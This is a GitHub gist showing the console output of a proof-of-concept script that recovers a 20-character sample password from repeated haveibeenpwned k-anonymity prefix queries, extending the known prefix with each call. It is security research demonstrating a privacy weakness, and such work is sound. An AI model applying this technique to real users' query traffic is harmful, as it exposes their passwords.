Skip to content

Instantly share code, notes, and snippets.

@stefanesser

stefanesser/gist:3b8911f6e9798daf8e0fcd469b7ceea8

Created June 20, 2018 15:47
Show Gist options
  • Save stefanesser/3b8911f6e9798daf8e0fcd469b7ceea8 to your computer and use it in GitHub Desktop.
Save stefanesser/3b8911f6e9798daf8e0fcd469b7ceea8 to your computer and use it in GitHub Desktop.
Download ZIP
Cracking a 20-char password from repeated #haveibeenpwned k-anonymity hashes [4, 2, 2, 2, 2, 2, 2, 2, 2]
Raw
gistfile1.txt
$ python crack-k-anonymity.py
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Converting calls: 4,2 for password: bananenBrot4321Alarm (len: 20)
[4, 2, 2, 2, 2, 2, 2, 2, 2]
First call to API: bana (d33a7) ---> this takes long but can be precomputed
... loading precalculated result instead of bruteforcing the first prefix
Found 11 candidate passwords in 0:00:00.002323 seconds (THIS WAS PRECALCULATED)
['bana', '9Rqe', 'Oibo', '2Uyt', 'U2au', 'UENT', 'MHCZ', 'XvL2', 'VdJ3', 'dO65', 'MYZ7']
Writing precalculated list to file for next run
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: banane (93ef5)
------------------------------------------------------------------------------
candidate: banaaa
candidate: 9Rqeaa
candidate: Oiboaa
candidate: 2Uytaa
candidate: U2auaa
candidate: UENTaa
candidate: MHCZaa
candidate: XvL2aa
candidate: VdJ3aa
candidate: dO65aa
candidate: MYZ7aa
- found 1 candidate passwords in 0:00:00.130779 seconds
['banane']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenB (575d6)
------------------------------------------------------------------------------
candidate: bananeaa
- found 1 candidate passwords in 0:00:00.011068 seconds
['bananenB']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBro (4280b)
------------------------------------------------------------------------------
candidate: bananenBaa
- found 1 candidate passwords in 0:00:00.011241 seconds
['bananenBro']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4 (11d3a)
------------------------------------------------------------------------------
candidate: bananenBroaa
- found 1 candidate passwords in 0:00:00.012373 seconds
['bananenBrot4']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot432 (4371a)
------------------------------------------------------------------------------
candidate: bananenBrot4aa
- found 1 candidate passwords in 0:00:00.011211 seconds
['bananenBrot432']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321A (8aa11)
------------------------------------------------------------------------------
candidate: bananenBrot432aa
- found 1 candidate passwords in 0:00:00.011286 seconds
['bananenBrot4321A']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321Ala (2020b)
------------------------------------------------------------------------------
candidate: bananenBrot4321Aaa
- found 1 candidate passwords in 0:00:00.011329 seconds
['bananenBrot4321Ala']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321Alarm (7117d)
------------------------------------------------------------------------------
candidate: bananenBrot4321Alaaa
- found 1 candidate passwords in 0:00:00.012205 seconds
['bananenBrot4321Alarm']
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment